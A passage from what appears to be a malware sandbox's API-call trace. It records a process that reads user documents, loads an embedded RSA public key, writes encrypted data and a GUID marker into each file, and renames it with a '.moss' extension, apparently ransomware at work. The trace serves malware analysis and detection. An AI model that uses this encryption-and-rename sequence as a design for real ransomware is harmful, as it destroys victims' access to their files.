0x35fbc90 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc080 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc050 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc050 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b449a8 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b44bb8 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.795] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.795] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc050 | out: hHeap=0xcd0000) returned 1 [0169.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b516f0 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.796] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd3e658 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd3e658 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bb8 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b516f0 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc080 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc068 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc038 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.796] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc020 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45b30 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449a8 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.797] WriteFile (in: hFile=0x664, lpBuffer=0x3b4b098*, nNumberOfBytesToWrite=0x6648, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b4b098*, lpNumberOfBytesWritten=0x401fb14*=0x6648, lpOverlapped=0x0) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0169.797] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x664d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.797] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.797] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.798] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41660 | out: hHeap=0xcd0000) returned 1 [0169.798] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.798] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.798] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.798] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.798] CloseHandle (hObject=0x664) returned 1 [0169.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.802] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b4b098 [0169.803] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.803] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pz2UAEy9Ul RH2d.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pz2uaey9ul rh2d.pdf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Pz2UAEy9Ul RH2d.pdf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pz2uaey9ul rh2d.pdf.moss")) returned 1 [0169.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4b098 | out: hHeap=0xcd0000) returned 1 [0169.804] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.804] VirtualFree (lpAddress=0x2d80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0169.805] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd80bd8 | out: hHeap=0xcd0000) returned 1 [0169.805] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff3d4dc0, ftCreationTime.dwHighDateTime=0x1d5e61f, ftLastAccessTime.dwLowDateTime=0x4ad41f0, ftLastAccessTime.dwHighDateTime=0x1d5dd85, ftLastWriteTime.dwLowDateTime=0x4ad41f0, ftLastWriteTime.dwHighDateTime=0x1d5dd85, nFileSizeHigh=0x0, nFileSizeLow=0xc98, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qG9cSLbVolqRPaJs1.ppt", cAlternateFileName="QG9CSL~1.PPT")) returned 1 [0169.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41660 [0169.805] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8e) returned 0xd80bd8 [0169.806] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b41660 | out: hHeap=0xcd0000) returned 1 [0169.806] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qG9cSLbVolqRPaJs1.ppt") returned=".ppt" [0169.806] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\qG9cSLbVolqRPaJs1.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qg9cslbvolqrpajs1.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.806] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=3224) returned 1 [0169.806] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.810] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xc72, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.810] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.811] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.811] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.811] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xc98, lpOverlapped=0x0) returned 1 [0169.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.811] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.811] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.811] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.812] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.812] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.813] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.813] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.813] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.813] GetLastError () returned 0x0 [0169.813] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.813] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.813] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.813] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.813] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.813] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.813] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.813] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xca0) returned 0x3b4b098 [0169.813] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.813] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.813] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.813] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.813] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b447b0 [0169.813] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45b30 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc020 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45b78 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc038 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc068 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc080 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.814] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc068 | out: hHeap=0xcd0000) returned 1 [0169.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc080 | out: hHeap=0xcd0000) returned 1 [0169.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.814] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd290 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc080 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc068 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.814] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc080 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc068 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.815] GetCurrentThreadId () returned 0x324 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b492f0 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35ceae8 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35deb08 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.815] GetCurrentThreadId () returned 0x324 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.815] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.815] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.816] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.816] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.816] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.816] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362c768 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc90 [0169.816] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.816] RtlAllocateHeap (HeapHandle=0xcd0000, 